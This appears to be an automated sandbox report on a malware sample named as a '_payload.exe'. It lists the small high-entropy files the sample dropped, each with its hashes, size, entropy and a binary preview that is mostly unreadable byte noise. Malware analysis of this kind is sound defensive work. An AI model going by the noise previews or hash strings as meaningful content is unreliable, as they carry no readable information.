                                                                                                SSDEEP:48:KXqULHATXlr1rUiRSUXjcDt1nBktyNIj9BtaKsLD:a/Elr1rUajXj+1/Ij9BDo
                                                                                                MD5:5973681D0EB676C535CDEAB81544C2A7
                                                                                                SHA1:D8B8ECC1E2CD0FDF4C0FB20A2469D6D09B4F8125
                                                                                                SHA-256:EB9B2EE310B876E95A1372132F9F0B667D53A36C6473CFA8DE02DB4BAB831DAB
                                                                                                SHA-512:CCDC7FE8C1B5B305DE68CE5F8359EDD857D6E62DB3C455AFEC0FAF8B385F78277175D357DE09A198C2B1DF43CA950EA490259C62A9959D05DAA3AC3507DBF1C4
                                                                                                Malicious:false
                                                                                                Preview:<?xml..4.x...+T.\&nA.Eg.H ...s..R.'.D....zh.U".c]o.)KK*..\...sAJ......K..~?3%|...n.8Ez..W?XoECR.U]...M>~......os...Rp...W..,.%..[.p...3..hJ.2[%;..o.G.....F..r...g.8.Ip.`.(.'..i.....n.%.u.....o<a..Vr{..{(.W./....6.....T..E{..h..n..,..Y.-u....p....*..j...GX...*.<`P.}......(<n...)%..;........._.2...I<..b....B..G.....'...`.k...,f..Hc.d...z..G{}.5.}d...$..}f...Tp.....1&.H....Q`...Pw.[j...v..Uy....R.~F....RHM.f.....4.G1...NU..6.....6...G...Q....d..0../.{z....G.uQeC....J..l.....Q....#.I[M..A.=..g.N.N........t.....^...G_.h...q?...z.@6..'.......b.!r.!...D.....?...P.....*y.....mea+.0..<./.HGX...k4..d..`..*.....W.j..f..{.~.A..?;..1.V....f.V._%L.J~c._..7.3...`.5...?j........mR....5UO,..2..36.U.g.~m..}..z.B.oy........e......>h..pa!.#..E.q...b.O.%..(M.&.t.#..u.L..2>#W(w.......1L..z6.=....&.#.......m.=.n.9...t.a.,|....k...;..+......l...*K...... Q5V(.j.wL..i.pl.F...cyI....i...%X.Mx.....k~..Z....hX..L."1qja....O\.S..V.Q..)....f....>*...QaG.8...S.O..h
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1726
                                                                                                Entropy (8bit):7.845685581168074
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:zIF6ugnvCGczoM5KQCin5oHiaVSOvoXwg3OxabWpq0qTwRHAuv8dBL5t4pkHEp5+:csumCGczoMcQ7AYOuU9WuEr0uHmCE6LD
                                                                                                MD5:2AE4F7DBC60BA425102E02671A5A1EC9
                                                                                                SHA1:E10F3BA222D239EC598C9F0D38498F43C3A719D9
                                                                                                SHA-256:BD71CFD04504F55502F4EDF3AE973F468C8F9180C7D3F81F397F78278F70CF0C
                                                                                                SHA-512:6864EBFBF8FBAB9DC292B85933398168DC01213280229F564CD4574482F1260ECDBB17C521F0A8D6BEFE0A240D59588BE97585170D1E2126322F383C2C454C9C
                                                                                                Malicious:false
                                                                                                Preview:<?xml...xVF]hi...............-...[g....Q.X....|.3..X.....nN...#.7nx[.x.....<X7"..).)..%..69x..&....4i.6..FJ......2R..L..d._^....*J_..0.8.....4E...%..\. .h......1.......+G;G@...g@.|....?O...;|B.A.=K%...>.0..J.s.X0Ivw...~.wDA....!...z...../wiFD...`..7...U.;b...3A.+......EGv......(C.m.h....O|..c.7>/..?,.9i$p[k.7,eyy..3i.( .-.\5P.a_\l..v?......_:.Ns..q....'..J.. ...2.&.vKM...tM.1.....g..|.O..e.C..V..9....D......E-..Nb.X..m..p..2...L..G6.Nxnj.li[s%..2b.1......\B...9.c.$....?7....*\.<.\e=........,xi..A}.P...K....:...np..*x>Xd5B...YK.u..X[A!........vz-.U/..?Y..g..)%...e...1..`@.f...JG.$.+e#1.v......JJ/P....>....m.|..9.......>.F..Ns)..z...s.....~.2.....P.d s..F!.r....((.i...]&....si.DO...(.....y=s...t.6Iz_)...@..rJ..[m -.m..O.([........C.Q%6..9.C.....:....3l...a.c&.C@.u.H.&LE.%{..0S.PZ9..1.e.+..5.~.>b....'.e...b..8.u........~24<.85.b....<..t............L..6,....w..D.. .5...]5..;...Yz...d.z...,A.N..X..g..x.........8t...}S..bg...w.s.#c...$.....f..v
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1701
                                                                                                Entropy (8bit):7.884081102928317
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QsssJjr3kFBHm1iWEeqNmGU9mr1GAcToUJ49tIPcGaZuIj+69jBjwHAQMf3yWE+c:Q/m0BWlq8G1UJstIPcv4ISgtCWExLD
                                                                                                MD5:09CDD0A33FEFCF4D95A2725C7C8068CF
                                                                                                SHA1:34CEC2EA132325501145BDCC599E8BB39CE39945
                                                                                                SHA-256:614FEA3D530CAEF893F6CF058F42A8579621F185C393ED6699DC22DC7AE20F77
                                                                                                SHA-512:7F7841E58B0183C77C8E99794D0EAF3F83D1F6A962722A964D3FD746CFAE139A036C2C4DF7423D8655ABC64C0B5E8B1DBCA3DD8CE7557FC7A7FE4A2329B2CE77
                                                                                                Malicious:false
                                                                                                Preview:<?xml.=B....=f7.J .o.i.....d~..X.n...K..wt...N...1...&.v..M..*jg\.|.M.@..r....j.;.d...5...5k..;.N[......9...(...H~.diz.g..........[H.>..Fo..]..H'.H........<sv.....P.T.`..EA..y...R?..%L.2... ..QW......K.:~I0..E.-G....3...%.:..E.}.Y.sSF....F...9.6=.n.......Q.w.....[D. [m.......;....^C#L....Q...;.Y76...uj8.jX..._..^4?..a...{...4r....UEOu..?...P.dT.#..a....Yq/KJ.m.. .. ..G.d.W...f*U.1.E..t..f.$n..\...Vzq\....`....+>D..~Jb..y.L.[Sl.....U/.h.'-..%.7..v...9.v....>.f6.BP..F.&..I...\.....E..`..7GCk.}..>......`W.]L...!q'.......q.qw@.l.+.......g.,......my...;.....5.i......EnN...A.....%."r..8Q.m}..N..Z.v.m....L.a......y..6..6%>Q.k..p................GNm.)T......nX..-...#.W6....F.....c........2.Mx +.P..INo....^.Ij*......8.".k..7.>~..ax..!3....L......V..[[..............8<.......2.C..]$.D..I......c.P....D.0....53.kT.....k.+L.p2.R.4......m>'...B.>..@.P.@.<|Y..../S.-.;.q!R._X....J.:..IO.....D....^&.txBU..L0eX...$.d....t7.g_:...o.0...fe}......A.A.W'go.w..l....JI
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1738
                                                                                                Entropy (8bit):7.873381631144703
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:3JVvEUMFvvLbfAmES5dXIeENDOkFBIpojrwQi9ruYQDLD:5zMF33A7S59INVObo9krDi
                                                                                                MD5:489E284ED561C57CB8D9313F16A74B4D
                                                                                                SHA1:356DA8A2CA8834C70C6A6741A087E5E421E611DE
                                                                                                SHA-256:CF9A1744B3748415FA6001EE0D9CE941CAC6FA010B5B735DAB9A34437E42640E
                                                                                                SHA-512:FEC22553934A040A26CA6C34A82036436FB15F0EE96CD5814D4569844E5411B700022499552BDABE1C5C926898BD5152C1B52EE39D0F5730396D568E81884D8E
                                                                                                Malicious:false
                                                                                                Preview:<?xmlC.~i*.t.ze.>..YY...G&...!.oHa.....T.F.............F.(..&e.,dM..6t....:...N ..?.v.v.]..A.~4....54.@.).=M.T.R...v.6?..m...-..Y............C+.#[/{d.n.(.....s._[..i.'.....f..b.d{..dKb...;_].4..l.l.#]D.;..\..o0[..%.D.zi~.. ....q...Pg...7.....u.NZmv.b..B.+...+..s.5....r...Je1z..$EE.U....)._~.....[.x\.)\.74.{..:CP...........lZ..E.[..3h..\..[.6.W.e~.|...'+a.x.....%0H@`.C.TLI./.....[.yw....G%..#.....B.A..X8.t...T...B..]39.....^......^..\R?.OG.....C._.k.]..0..J?<-.~7.L.{X.3...k.x.MpC_.D...........,,.......7[.x:=.....5......t.mN).......*[..2...].y|..!.....g..k...h. ..py......@1....z ...h)t.+...t.`.@.u....8.Z....)...YH..5.....RD....?@.q..G.u$JL._.......D...Z.Z<|.[[....W..bE..3`..m.-..pQYM.oD.d$..zm..XA.c...?..Oa...}...>.9E.<o......eR..Kd.5p[...-..5...a..$Wh...a5U...2`.}...V\..4.>O.n.!.$...Z......].).a.u...G..>..)...9...MG|k.....Q&.@.R.p.\.L54....;...P.V'.*|.q0p...N0.%MG..Mh.J..C)..W..."Z...8y..+b Y..BT...f"Z..sQ.FS.....Y.w.u..?E.~..p.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1689
                                                                                                Entropy (8bit):7.870203253524081
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:yAp5o5+GcoDakFvzVgesN2E3b1lWxFsLD:b54+GswzVtsNrr1lmK
                                                                                                MD5:1F169B96ED5F30A7374F517B8A9CC936
                                                                                                SHA1:B7363FC562BC0409DD22BE23EC1CAA06331A8133
                                                                                                SHA-256:E898820AAA0008240671057FB8C6324AFB4F5152B3D10DD339DE8A68336B57C1
                                                                                                SHA-512:9F83C56AC7BBAA81C9C585B83C4E97D3E64A03DF44868F21FB67628DC78800FB22ED9507D0C2C7C2DDB92C1A471AA125ED151862C0311C12D0AF64BD89F33000
                                                                                                Malicious:false
                                                                                                Preview:<?xml.I.#.[.W...G..R%.......X'g...Vp....i....Z\..S...C..FG4^.T..7M.pm.....3G.d.i.a..{Y.+_...X....1.8W....47_*.=..jx|MAD...q.........k..i.T..F..Y..(.Ud.=v.S9.G>`.w.........aK.NB.,.#.....A.#...A..&*......t..8Yk..'......[..s....\-w.....Ln..L.@.gA..k...]im2.C.^.V...<.Z.l.}.4G...d'.n.Q.....i..W........|......i`.g...39... D..[f@jgbD...FC...R.4..{.<.......Ww...U}...'..M..`..wBFK.\...z&A.......4.......ML.]>......R.)....I..H~h.)1.K<..l....#.t.f..$4e....J2...a..I^.u...a.9.[..^<...?%0. ..j....L_?{.1..`O%B<........Y.FO....C.....nV..Z._...*...USc..0.....>H..1.~.z...[..k....A3...4q.)i.Nj..T..X.!.{.5.w......y..B..?lB=...-...q...O..C5..G~.....D.....@...k.,p.I.......>0.P..v..Yq......L......zb...#S:-..c...@.V.cO.c./.^.....?.(.dx.?...o8BD...C.:.\J../.2.j)E.5..x..z........[Fm..k[...6.\K...1A..)Y.|:O.Of..W.L...)....o..6..v.Pl.....yk.~.k)...5.$."D]#...`.-..Rr.;J/]>p.^...pd.......].kz.S.f...o.[MY._ _XIT..X...[..].E..K.5W........nBj..j)...LZQ..L.[.o.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1726
                                                                                                Entropy (8bit):7.895422525995893
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:zTADedmmRDtP0w/OmN97V55sC5g7tyPUQHJro/9pLD:zTADedLRBMUN97FhQAcalo1d
                                                                                                MD5:50D7439D429F097C24F3B6F6DEB77A94
                                                                                                SHA1:921E0CE69DB1CD37A43668E5D68D2ED5F56B461B
                                                                                                SHA-256:E8DF0A2B82E632893E4A991DCCE094310E0E8A1FA264CA1F99039ECF4DFB240E
                                                                                                SHA-512:30DF7B7EEA5D0C629923A43E41BD197F491D12305E5774C8C6E22A58C1A67A2E13F10D230C9839825228D89B5DF579FE3F230758C8F7C9902B02F5901C9A56A5
                                                                                                Malicious:false
                                                                                                Preview:<?xmld3..IM|.V.6..f._C..........,.)??.... ..2XE.o.......s(.E..B7p.^..#...P@qr.(.kF#.&.d../...1.E@5..Ilob/ID-.h.TcA....N&.,..7&..."..i.g>U.<a....v....5.q.U...#z.p.;.j.tl..A.<.\....GD/....g...=.aM.1|).=w..8.....s..,.o.@M`...H<y..@T..(T.....9M...{..O.b.:v.5..8.j....{aQ.;...../....".x..7.(.3....2./....a)l..%...}L...)......dX.k..re..lT...#.......w#El.Ka..X.<M.+...(..#...].s.ZOh.~..uS...@.....N..s.*./....?N.O......:.^...!..~....Y.l.s.<.j..D.N.Od...t.)..."...qzq...Um.H_.....1..B..0i.....u.............D.....a-.Op.!.XJJt......=..z....,3.%TEP.O{-l.h'/nyZC#L^.3..Pe}.....&...P.z..Z.W(..im..T.....9..#.j%.JU/S.n..,f....!..fD.OZ.m...".#K..:...L..1.....7.W\&.LT.j..1.o)._7H..Y.&...d......../..F<...........y.....yb..../.....B.-...w..I.#.....[..c......Q..w...70.....j.f.}.-......ut.~....a.!2.3.....jW..X..~..z...#~..<...o..K2..H...2i.e.8.H........;r.P.^....s..o..-).]..g..i#.x...6.......G'.aU.q..p.}..?.6.^`...r.5.&3..........sl...#......Rx.n.!...^...r...A.U.,.m.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1697
                                                                                                Entropy (8bit):7.858199234880726
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:YEN4l+n9eAHOkN3bylwAQE/5vDnD8cQPCmIj3FILD:YES+9POkN3ewATZnD9S
                                                                                                MD5:670E86764B4FA725AA617B49A1B13D6A
                                                                                                SHA1:E857EA3FA19CC7156155ECAC66A70A02CE0D2262
                                                                                                SHA-256:08507847CFF3F8C54AE88DF81AB27B59A7719BDF93E9D5447412342627F02FFD
                                                                                                SHA-512:C02DCFCA6A29AE01D935E26B381A9148C8991461095B17133574699DE733F396A7635085FA8C8885E02461498D1877F24E70A423937AAC66391801AE8B669B04
                                                                                                Malicious:false
                                                                                                Preview:<?xml..rf..Nn.v.O..!hw..,.rR...a. ......[4(....kV$..+.......u4s../.D.%CX...,~V..3..>)......$.X....e5c..c..6\.....H.....w..$hJ.u.B...:.E.he..Z.....yt..H.p9...=..VI.B..A7..Gp.....b3Nhm...Z..NXc....b![fNQV......|.o..~.6u.\..2..XM...{..X"...T.13L..u.`c...t...(.y7..B"..=.8..e...*Y..P.s...T.g..,!.n..C...Q5..Y...#.....9....u$..3.x-w..T.x......*..>.g;.I*u.<..Dm@L.`..P......:N.V...J.....b,.0Q...F..V....:.P..\l#dx......K...[.TP..*.;.......+......*.Q&K".kQQ]v!u.O.LJ...V.ml.$zO.....x.v...$&..Cv......"....>P..@.M.rEI7[[r....ym..t..X6....wb7D...L...y[....X.V^19...'}..u...oN....o....=./.pE.<...|..>..Q.;Ev..^./2.Y!....R.oXM.xt8..-Rp..O....).U......1..S8.X...x#q...pi.u..7@W...>...|\T.0..d+M..j.....h.8.......{"..n.E$Q)L.....y...d......W.6m..A.b-.?J(.../........cOR^LUa6.4o.=y.d..|.C...uq.>%..HrK.....$..H...r<.b..!O.]g..C.....e.D.8m.=....kN..R.tD6....\l.... ..b.n?5...>V.;....7e....V....0./s.S.&....nY.E..D....%o.a3,M..8Kq1J......u|.$._.9.,....I.tm.N..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1734
                                                                                                Entropy (8bit):7.881705449411702
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:yLIatlmgYeZKO48KuPfHHwBxFcnTpYeCZXX0hPLD:S5tlOeiuXwT4pYeSEhP
                                                                                                MD5:66916724DC4ED418FE119898F83DABC7
                                                                                                SHA1:0BE64A50233847BF5D484BD7240BD7421BFD25AE
                                                                                                SHA-256:3B36E314F991D8A3C06FFD4FB111D77BE9EA5C497085695C69C95D49E51AC423
                                                                                                SHA-512:8058E06654A92EBEDCA7933C348E57B8973035F7A65015277620CB947FFFBEDAA74667EC535C23A5EABAB1ABCB8B5DA432921B2DCF89D6CDAD7D9407D34E81F1
                                                                                                Malicious:false
                                                                                                Preview:<?xml.oR.....AJ..d..Jq.4.Y..&E.3..)..%..az...."#J-...<?.)....'..XFJ...pO.}F..Z...n...}qOl'......bK....i..9.....'"TZ..1..X....5[{..).....FUU9..C.o.n.Z........&lW:....... .#.,...Y.[.j...(R.\g.Q)...i...:.N.H...Z.<.I&....x.%p7....Q.".Uag0D....o(..j.,..>..8+.|Q.....f.....1...$.m.P.!.H...E.a....{.O..!..)v)Q0...Q\hIF...#J\*.<....K..2!.[......H.f-!.0p..)..k_.F nj.)&....o..NC4.z*.]n...s. .xa...& Z<J.@!6../.3..'.j6...<........H......5..[.:.E...d..q^.N.d...p..d.....Mn....9.7....$..p...{..O...H..@(....~........D.S .5..>...EI.K..[t.b.......1d..._z.oJ"...AA..B..o|.Q.[..T.~lZ]|._+.. |...m..S....../...O.~...u. ..e.k....h..MU.b.i/.}..w..'.G.......I..T..G]....6c.H....._:k..[X....!..p.B..."...Ql.v....{-{lk......?.H..m?..{...v..`..|.]m..z..A.+N.8y....A.....]..<.D...1..cLa6.gn.$.....@..c!...J...X0.._..0J..5...V.W.."..F...C...U...f{..I...M`.....iHu....L.k.!ls............_Z......CQ$M~.................a'.... 4.....2.Z.........lH.G<.V..x!.....s.sZ..T..e...dWfm..v.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1695
                                                                                                Entropy (8bit):7.891207948354942
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Eb1qBoursf02Cv1q4ddXDYDPa3/E4FPWnNnYCLD:Ex0oJf0hv1JYDyvEcPWnN
                                                                                                MD5:8D93829A8104A7EBEA847D24F88E7980
                                                                                                SHA1:8A444AEE7D31549C58D1950627EB180C29A35D7D
                                                                                                SHA-256:CEFAFE6B2EB5615AAD6140A289BE3850D450EE407EB8AE0CF529EEF4504B93AD
                                                                                                SHA-512:4B0851FD92DCBC0B541C9CE84B33925993A722BFC2313446F5390F71FF19E8BA5482AA944CA2EC0FD97F658F60AA21969F2591ABCF1BFC135EC8C3608C8B98A6
                                                                                                Malicious:false
                                                                                                Preview:<?xml9..>..`....Au.......>.1s6...hY*.P.....fg........'..|.V..&......? ....}..{t+......e.va.m..0.a....Kx.U...fo...... t.P'6...5.{,.MR8..'[..r.fD.x...(e../...XGd.J.1cGa.v...#.u..ys... ....0.F.Wv.)..q.M0..'j...]....`..6.;"A\'..BU..=..U.....\*m..7c.|..J..@....xR.8..w.5)....-..;*ag.._......w..Z`........f..Pt.+...[tZ_X.?.*@...L..k-./+~.OV..h.#W?..T.;k=~$.!y..vO.b.T.H%.r.....y.....g..N0.Z'.. d.........*.vkw......N1dA..i..10.T...c...W+I.<d.l..Qg.V....z...=.I.M...*.x..m.j.?..F|O....S.$.."...Vf.K@..2x.F..._dbIhJ..Z.....l^.....".....x.."(.O.MB.<.M....C.......z1z......`..:.......?P.a.JA@....?...bF1....0s#v*..v|...a@?P....:..L..\._..D.?..m..5.KR..............L..H.....I..B..u.....X(.C*..;.K....}.H.=..qX*~..di.T-..~..~.x7.Y.f...e.K.ZP@....[..!.q..-.!.......Q..Y.r.E..F.:.P.Mb.>W.n.....G..%8.<r..~../.C.t...p...KH..B.......t.H6;=X...N.Q.....7............}."YC....R.S.gH.q.Y...>:v.^$....1..^:,.0.fZw...r..-.t.#..L..)`...w..*u.g....a-.v...l..J.&-.m.9.....=
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1732
                                                                                                Entropy (8bit):7.878506073839649
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:JlmVgfVFe3wh6M0Q76+zHq9+kXseOnheQTLnuInLD:J3VcjMs+7q9bXseyheQL
                                                                                                MD5:F043480C8981444592615E48155137A0
                                                                                                SHA1:298D3D761DF2DDEBB13BC74156DE48E55055F4E8
                                                                                                SHA-256:9971CC92B326CBD5638BE20AC14DF2984DAB8342473872C039BF397045D0FB0A
                                                                                                SHA-512:A040D66C1A267F30D541E8E4AA0CD73D3C7599EAB856731776CFB6EEBF37BCCC23B3F83C53DD95C1BFD214070C9126725E70E3C44700AC6A8774E421DC2117D7
                                                                                                Malicious:false
                                                                                                Preview:<?xml&q.B1.5.kd...~...S..{..w....Y"...m]x4..oz....H;.|.......x....y.X...B.TyP.|8.d..2.!....=.i....&%Qv..T&.OR..+...S..M.99MS..........'...y@..-?...<...|z.T...^1k{!m....1.S..:.?...1~.p.b.;8./.l.#.....V.....Z>B.a...-.g..H.x..G..RmNv.}.XCIeg.S.....S..1....H...Q]wHm..0Y......|......n.}....O...O..3.3G.m........ .V.7}...s..bE...%..i7...!".*.Ec.2&M.AY.S-_.h...IV.C.N...>w.Z.F..[..U......VJ.|...`kz.u.JOa...R.M...t...v.V9.Q.r..$.2.s..aDn..+.4. .{F.\o!Qnn..nOR.....XQ...o.h...9.>.r.Ov....(.F1..12=@0=x5W..A<......-k.s.........^.....@.4......}..~.......$.....;~..v..n..pF...Z.Y...:X..V.U7R...7..9...-....3.#3...G......W>.6...Pb.?..U.*6.4).5.Z=.4...8K...|..O.FF..5.O.5;x.&.0.H.e..Q~..9/)M..9({.{.HAr~.52.B....Dx(MU..r/}.....9.^.R......r..Iu$..)~m!.....2..iQ........a?.?.._........J...O.oM.\.#. q..+.....eW6.....LK..F.4...*.CD..[.u.o.Mq^pA7..2..GW.u.f...;...Q..,.U.`/...Yv/E...f.jf.N...W9q.c..8Q6......I.d..t"..#......Z8..Q...?.r..sM..9....]LO..h.Wq|.:.7.l_C
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1697
                                                                                                Entropy (8bit):7.874785332241869
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:UtZ+RC3dwg6a3USeXAUWInGkbEUqjWuLD:UtZ+6ag6gJeQcIUbW
                                                                                                MD5:108F741DE353B88839173BA7ED1DD3CA
                                                                                                SHA1:62C8264EBA0D5257CDE5CC6693000FBC84F59331
                                                                                                SHA-256:B2C381D851C2DC26CDCDE686BBCD0F1EE416109A26CAE6A4EFFF8AFB19A7B959
                                                                                                SHA-512:F299A080BEFD5ED7F7270031E0AB6EDD5D92AA62A4CB5AC15737940C4FD3CE0F11A9D3DA3FA3CAA85E3848F0EC75099362CE8B73BF33BE128FD11E0A8F108FAD
                                                                                                Malicious:false
                                                                                                Preview:<?xml.......d......o.n..R.Q.+3..c7... +.G...f...:......F..-..d....(l|....-..AwR...K..: .....t...y....5)P..H9......H...........H..oS.g...?/]....ZE..[.J........].....kS...mY..}...D.jN*}...U...NG>.....w...k....t.Q.bw..5N2`Q..-..=..Yl J..q.tt+...Rr..#bi.s<...`..~..fz.w..$.Lp..ugF..J..Q.?.&Q. ...h|.[!...l..0..!..ek...2.7m.lygU..t.0+>...^.g..Us.T.E.%....8mi......%.9&...R.2.31q./f.Q/#.i.M..........h..-#..6.0.........[...my.E...AgR....n!."S..E.'....R._I.......v..0t.*..x...5.M.8.^.......+.W.\.(".....j.Lf:%.K"6..........Q.0].=yF..w5aB..jvy80....~..+..|#...".w_.e.ku>J..%.)i.#.&....7........d....(+.:...4d..1...BZ...7......Y.....~............H..2....#.x.DT..L.....b.W.s.;...).....W....p...{p..3.%a...fyWp.=C.WZ..G...."M..q....;.....a:.t.r..,.m.....").5@.:.X..E.b..|..PB.H..N..G..qS.zMT.P.]....=..O.K"...V.p$u.E..P..0......dB:!'G'SM.j.M...r^;..p..;.\.G...Pc?..C.....a..G.......'@T.(..zc.A.Iti.g....|....G..2heU..=L.........8...!.}.J..e....7.n...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1734
                                                                                                Entropy (8bit):7.886717754742934
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:n9iYlUEjnzHKAYgR83eFcaHb0GV9kj9ECJMLD:Nl7jnmdjVokj9k
                                                                                                MD5:C209606D942C549F3EFEE81EBDD68C5B
                                                                                                SHA1:EC1DF871EAE451774CCF86C7409EED13D2AE6E6D
                                                                                                SHA-256:8B3EA95B5936A27F946331832E6723C44812DCECCE46818BC0D790C1AAC19E07
                                                                                                SHA-512:A954265A5AC6DDFCCF9BA4860840824C9129C04BC7B3808F6329C37773752744913DBF7938AB3211DCC80FFB12E8310ABEE3C85B3A3B9032FB89025622339780
                                                                                                Malicious:false
                                                                                                Preview:<?xml"....n-f...?t...p...<....~...e....~2.7...SQ0..kd............i..\A..@...ehv..}.z.= T>..?..m.\...>..gJ.&..X...x.3.?._.go.G..^..bV*cw.....N....N...yV..qYC.'-p...FL.]&....`n.Q..7s..m.~J3(C..O".....2..d.49p8Q.....T.^R=..B.2n.pAVg..3;Y7.E+.k..j....%.......*./.[.......F.....k.~.X6..."v?.P. ..+..He....QX........Cg.m..(a9..H....S.g.....M%.....KVp...1^E.r.F..~.ho..p.A....W.S....W..g........'x.Z{lw....c.._%/..............G....f.....% @4...j.~.a........L..K.W.*..<.k....<./.:.I..]D...._=?{...).}.2...$.u..3nO..mk..I...6m.. .k%d..x*v.|..?Tx.....>..W.-u.B..x..N..,^..i^.L.......4b..C...>...r....I;j.}..;..... z....`f$.a...m.]p..V...739l]#..:.............8.K.......fd.p.......*.Xl~..U...H3....k}3f.1.3.0.!N....V.....\Sg.r..t........{....4.0..P..nf........9.,...*.....S..8K...h..i...c\....Gbu...I#-[.!B....y.1.[.H....8Q.c.a..b....m=.. ../....-3..B......+M4...rYB.}....j$.*..!.a.....*1.N..8.v...t...E...,.(...(hZj..9..aU..02.gy.?.;....c..XT..d.[.......Ywn.o
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1710
                                                                                                Entropy (8bit):7.876688869671638
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:uvO2I/5XbeuFy01D6u6vGQlYkCEqiN1Q3C2itKXaTIaXAyvWAnGOV62q10z+JMpZ:K8Xb/4GDAtdbak/eUA2T2MpU9H8fLD
                                                                                                MD5:463C70D5C27C5570C258B510E5554E7E
                                                                                                SHA1:BF46B4FFC5A59BCDA5F938478448084A90A3BC48
                                                                                                SHA-256:29CB2B634C50032DDD569ED019F8B54BF22D182A5EA4299AAE700436F54A18C9
                                                                                                SHA-512:ED4457C8172CB7AC3F7B78D236F5B5E2067098983B4D490F6B124984F11743C45C57E7C94B96A522C4FDF9FB5FCEDAC92A3054BEFA33C001E2482C1F0BAE642C
                                                                                                Malicious:false
                                                                                                Preview:<?xml..&\...X...)a...,?LUC8..Q-.....\.5+.S....p....q......[......P.A....P.f5.]J...2/L.....p.[sp....("8b.F........vA.#.}s.5....;]1(9....\..x$.l../...wE..>..}.......5m..... .*|i.1w<.t.......#$"R.Mv...I..j....8..l........n../.3H.x...+.4... "/.(W.?.?.....yrA^..M.....rR.+..5R.....p....hq.c.O!..o..y..M.&f.wt... #"...Hu3p.8.....-e....j.N........I..AIs...&....\._......dd..../...v.x...".o.}.t...6.......>.d.t.^>..I.:o...5...j.L......sN.....<...u[.o..;^...&.....'H.}....).Y'].wi..a.X..y...k..X.....)..4...[<..'.......>.1(.8:..\...(.....C.K.....}~...#.&M..G.4.@..G.iM.L...0.V$.....a.y.........'....6..LW...i.........$.v..L.a>x.....=s..g..9S..i d2.u........1Y..c.....l...6.$..........;E..'...5.wH:...P.M..p.:%,5.9...1.V....l.....9.K.45u..vj^9.p9.>...T.{....:.W....5.^.....:,.A*Z.{)..BVl..uo...|....+.~.nR....1gk....R.....5...w....f."..U..z....N5...Xz..AK..m.!...........kg.f.i......WOvL.NU.`...C<....9..m..O...LD.~.k.m...............v..).J...4...JgR.uZ.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1747
                                                                                                Entropy (8bit):7.882880882841093
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:IS7js3tzkZasWRhB4Kow3Ck8ufXp2einisJF4rVtiLD:IYW5OWRHNow3SufDuX4rVti
                                                                                                MD5:A1175C1A7C30048441F99D06910A0D30
                                                                                                SHA1:1ACBFDE46E95D0EF6252D17C900991D71F440B45
                                                                                                SHA-256:8D137F8F647C9EAAD068F787E33DF9833E30104C141C187CC73F01CB8827BD70
                                                                                                SHA-512:8182989F97E65AA813693389A0A76C419C9D3556B6651023DA337419D3CA6E0136F682B91492680289B70C54C13F17630E4A3E38E1A6CD0B4A95107684411490
                                                                                                Malicious:false
